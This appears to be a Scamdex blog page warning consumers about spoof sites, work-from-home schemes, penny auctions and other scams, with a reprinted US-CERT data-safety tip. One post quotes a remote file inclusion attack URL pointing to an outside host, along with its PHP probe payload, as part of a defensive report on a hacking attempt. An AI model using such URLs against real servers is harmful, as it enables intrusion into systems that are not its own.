Websites

Spoof websites bilk Caledonia man out of $30K

A man in Caledonia, Wisconsin thought he was buying a car from a reputable website (autotrader.com) and paying for it using a reputable financial site (amazonpayments.com). Turned out that both sites were so-called ‘spoof sites’ – Identical copies of valid website, used to capture personal information such as credit card numbers/passwords or, as in this case, to make it appear that a bona-fide tramsaction was taking place.2009 Porsche Cayman

The Porche Cayman he paid $30,000 for did not show up and by the time he realised, the cash had flown to Romania.

The lesson?

Never trust a link supplied to you from email or a website, especially if it is a financial transaction. Always go independantly to websites using your own bookmarks or typing the url in. it’s insanely easy to show the ‘correct’ link but to go to a different one when it is clicked. Financial Sites Always use ‘https’ instead of ‘httpd’. No Exceptions. Look at your online bank url when you are logged in some time.

Check the address bar of your browser. It’s trying to keep you safe.

Read More at the Caledonia Patch website (it’s the real one, trust me!)

WORK FROM HOME!!! (yep, it’s yet another scam)

Anyone online or offline has seen the ads by now –

Money Motivated Pros | Team Leaders Needed | Looking for Recruiters | Professionals Needed | Remote Agents Needed | Top Guns Only | Business Development | Marketing Reps | Senior Account Executives |
Promotional Managers | Looking for Talent | Junior Account Executive | Marketing and Sales | We Need Strong Phone Associates – Incoming Calls | Seasoned Reps /Team Leaders | Looking for Experienced Team Builders | Inbound Phone Associates |Sales Openers and Closers Needed Now – All Inbound | Confident Strong Reps for Easy Phone Work | Inbound Sales/Marketing Representatives | Phone Based Sales | Team Leaders Needed – All Calls Incoming

Whether it’s spam, popups, ads on your favorite website, flyers stuffed in your letterbox or even personal solicitation – it’s everywhere and there is a very good reason.

I’m talking about the ‘Free Cash Machine’ or ‘Daily Income Career Network’  (aka hundreds of other names which change daily).

It’s an operation which while technically isn’t a scam, it sails as close to the ‘S’ word as possible and uses every unethical and questionably moral trick in the very same book that scammers use.

How it works
Daily Income Network Video – How it all works (according to them)

This is a very sophisticated operation that strings together every tried and trusted technique (Ponzi, MLM, Affiliate Marketing, Spam, Deceptive Advertizing) into one large funnel, with your money at one end and their bank account at the other.

Their advertising is very keen to make out that it costs you nothing (to get started). This alone helps them get past one hurdle, the on-line job websites will not accept any vacancy that carried an up-front fee. So that means that CareerBuilder, Craigslist, Your-Local-Classifieds and more will be full of the same ad in a different cloak.

Scam Job Listing on CareerBuilder

Part 1 – Trainee
After looking through their training materials, it first appears that the ‘job’ is signing up for trial periods with web-based companies (such as Free Credit Reports, ID Protection, Satellite Dishes etc.). After doing this, the job is to get as many other people to do the same thing. This generates affiliate income which is where all the $20 bills start appearing. Spam more of the people you know into signing up for dodgy services and the more money you make. (more…)

Asterpix (who they?) vs. Google

Some Background FirstAsterpix Logo

A company called Asterpix (www.asterpix.com) have a cool tool (Searchlight) for websites (such as this one!).  They analyse the page you are on, include any recent search terms passed in (eg. from Google) and the website you are on and generate a Tag Cloud of words and phrases that seem to be interesting, by means of search terms or frequency of occurance or other weighting.

When a user clicks on one of the phrases in the tag cloud, they are taken to a fairly plain looking Google Search Results page with a (Google Adsense) ad block at top and bottom. While the search page is hosted on Asterpixs’ website, the Google Adsense account is the original site owners.

A visitor clicks on an ad, the revenue goes to the site owner – what could be simpler?

The Problem is ….

(more…)

Powell Exotic Furniture Website Spoof Scam – PEFURNITURE.NET

Administrative assistant needed by Powell Exotic Furniture,Good pay and flexible hours, see attached pdf for more info or sign up via www.pefurniture.net/careers.php

Here’s a new website spoof scam – take the website of a perfectly respectable, American furniture company – Nichols & Stone and copy it. Then substitute the new name ‘Powell Exotic Furniture’ and register a domain name – PEFURNITURE.NET

Here’s the domain name details  – complete rubbish as usual – created in February, updated today.

complete Domain Name: PEFURNITURE.NET
   Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
   Referral URL: http://www.PublicDomainRegistry.com
   Creation Date: 06-feb-2010
   Last update of whois database: Tue, 11 May 2010 21:47:04 UTC <<<

Registration Service Provided By: HIGH HOSTING ENTERPRISES, INC
Contact: +001.8503682092

Registrant:
    PHYLLIS THOMPSON
    William Ace        (surveyciti@rocketmail.com)
    21 E. Penn St
    Mundeline    IL,60060    US
    Tel. +1.2066664204

Obviously this is a scam. do not go there or give any of your details – you have been warned

Swoopo, BidRivals (and other Penny Auction sites) – Are they a Scam?

My answer is ‘Probably Yes‘!

These sites (and there are plenty of copycats) appear to operate as eBay-type auctions, but they have several important differences which people need to be aware of: The main one being, unlike eBay, when the auction ends, it doesn’t!

These are not real, fair auctions like you’d expect – you bid in tiny increments, say a penny – but, every penny costs you around 60 cents (or equivalent local currency) and every bid costs money so the more bids that are made on an item, the more money the ‘house’ gets. Everyone pays, not just the winner and simple math shows that the company nearly always equals or exceeds the value of the item in bids.

It’s obviously a huge money spinner – a few ordinary goods seem to be going for $5, when in reality they can be paid for many times over by the losing-but-paying other bidders. (more…)

PHP Exploit URL foxes Apache

There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press‘. So, can someone clever please tell me why this simple url hangs up a bunch of seemingly dissimilar web servers:

http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?

My banana was once part of a bunch very similar to this one

My banana was once part of a bunch very similar to this one

Here’s the deal – when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obviousl hack-attempts  is to block the IP address or use .htaccess rewrite rules to send them to an oh-so-friendly  ‘go away page‘ :).

In this case, the URL carries a payload that is itself a  link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in it’s entirety here) will, if allowed to run, return the word ‘FeelCoMz’ to the ‘sKriptKiDee’, aka ‘Wanker’  on the sending end.

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

So… it didn’t work, I trapped it and it raised a red flag, but then why, when I try the URL does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on it’s back?

Analyzing the url gets me to this reduction of required parts:

* any .php file path.
* any query string, that contains a ‘http://’ in
* must have a file extension such as txt, gif, png etc.
* must have the trailing ‘?’

will cause the same problem on an awful lot of famous name servers. For example, including mine: scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc etc.

For example, in the following link, everything except ‘www.amazon.com’ is made up

http://www.amazon.com/a.php?b=http://c.gif?

but it still exhibits the same behaviour – WTF is going on?

and why, oh why can’t I detect it in my .htaccess file?

First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.

gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it – or even my second best earphones.

Good luck!

_________________________________

Still no replies and it’s still happening…. where have all the gurus gone?

Who or What is BobBear?

In my infrequent callouts to other websites that  (like Scamdex) were  created out of the blind fury experinced by seeing bad people taking money from good people, I have another site for you to take notice of.

But first, a recap:

When Scamdex started in 2004, there were very few sites about scams and Internet fraud; we felt there was a need to educate people and, using the power of Search Engines, set out to make it easy to check on emails and websites.

Since then, the field has  grown – lots of Government-funded sites have sprung up, large Internet organizations  have (finally) acknowledged that fraud does happen and now devote precious pages to warning their customers  “it’s not our fault, please don’t bother trying to sue us” “there are unscrupulous people out there so please don’t use Western Union to but Laptops from Nigeria” etc…

But still Scamdex and the many other privately run websites continue in their (often one-manned) struggle against the odds and so to one of these: ‘BobBear’

Bob Bear Website Logo

Bob Bear Website Logo

Bobbear.co.uk is a voluntary, non-profit site dedicated to providing information on fake companies offering part-time, work from home job scams, in particular money mule or money transfer fraud, aka ‘payment transfer agent’ scams and the related reshipping fraud or ‘parcels agent’ scams. They also provide victim advice and support. If you receive a suspect spam offering you a job or find a website offering fraud jobs then please send them (and us) a copy.

Please support them – you know it makes sense!

Cyber Security Tip: Safeguarding Your Data

Cyber Security Tip ST06-008  Safeguarding Your Data

When there are multiple people using your computer and/or you store  sensitive personal and work-related data on your computer, it is especially important to take extra security precautions.

Why isn’t “more” better?

Maybe there is an extra software program included with a program you bought. Or perhaps you found a free download online. You may be tempted to install  the programs just because you can, or because you think you might use them  later. However, even if the source and the software are legitimate, there  may  be hidden risks. And if other people use your computer, there are  additional risks.

These risks become especially important if you use your computer to manage  your personal finances (banking, taxes, online bill payment, etc.), store  sensitive personal data, or perform work-related activities away from the  office. However, there are steps you can take to protect yourself and protect your finances with several invoice tools.

How can you protect both your personal and work-related data?

1. Use and maintain anti-virus software and a firewall – Protect yourself against viruses and Trojan horses that may steal or modify the data on  your own computer and leave you vulnerable by using anti-virus software and a firewall (see Understanding Anti-Virus Software and Understanding  Firewalls  for  more information).  Make  sure to keep your virus definitions up to date.

2. Regularly scan your computer for spyware – Spyware or adware hidden in software programs may affect the performance of your computer and give  attackers access to your data. Use a legitimate anti-spyware program to scan your computer and remove any of these files (see Recognizing and Avoiding Spyware for more information). Many anti-virus products have incorporated spyware detection.

3.  Keep software up to date – Install software patches so that attackers cannot  take  advantage  of known problems or vulnerabilities (see Understanding Patches for more information). Many operating systems offer automatic updates. If this option is available, you should turn it on.

4.  Evaluate  your  software’s settings – The default settings of most  software enable all available functionality. However, attackers may be able to take advantage of this functionality to access your computer. It is especially important to check the settings for software that connects to the internet (browsers, email clients, etc.). Apply the highest level of security available that still gives you the functionality you need.

5.  Avoid unused software programs – Do not clutter your computer with unnecessary software programs. If you have programs on your computer that  you  do  not use, consider uninstalling them. In addition to  consuming system resources, these programs may contain vulnerabilities  that, if not patched, may allow an attacker to access your computer.

6.Consider creating separate user accounts – If there are other people using  your  computer,  you  may  be worried that someone else may accidentally access, modify, and/or delete your files. Most operating  systems (including Windows XP and Vista, Mac OS X, and Linux) give you the option of creating a different user account for each user, and yo  can set the amount of access and privileges for each account. You may also  choose  to have separate accounts for your work and personal
purposes. While this approach will not completely isolate each area, it  does offer some additional protection. However, it will not protect your computer against vulnerabilities that give an attacker administrative  privileges. Ideally, you will have separate computers for work and  personal use; this will offer a different type of protection.

7.  Establish guidelines for computer use – If there are multiple people  using your computer, especially children, make sure they understand how  to se  the  computer and internet safely. Setting boundaries and  guidelines will help to protect your data (see Keeping Children Safe  Online for more information).

8.  Use passwords and encrypt sensitive files – Passwords and other security  features add layers of protection if used appropriately (see Choosing and  Protecting  Passwords  and Supplementing  Passwords for more  information). By encrypting files, you ensure that unauthorized people
can’t view data even if they can physically access it. You may also want  to consider options for full disk encryption, which prevents a thief from  even starting your laptop without a passphrase. When you use  encryption, it is important to remember your passwords and passphrases;  if you forget or lose them, you may lose your data.

9. Follow  corporate  policies  for handling and storing work-related  information – If you use your computer for work-related purposes, make  sure to follow any corporate policies for handling and storing the information.  These policies  were likely established to protect  proprietary information and customer data, as well as to protect you and the company from liability. Even if it is not explicitly stated in your  corporate policy, you should avoid allowing other people, including  family members, to use a computer that contains corporate data.

10. Dispose of sensitive information properly – Simply deleting a file does not completely erase it. To ensure that an attacker cannot access these files,  make  sure that you adequately erase sensitive files (see Effectively Erasing Files for more information).

11. Follow good security habits – Review other security tips for ways to protect yourself and your data.
_________________________________________________________________
Author: Mindi McDowell   Produced 2006 by US-CERT, a government organization.
<http://www.us-cert.gov/cas/tips/ST06-008.html>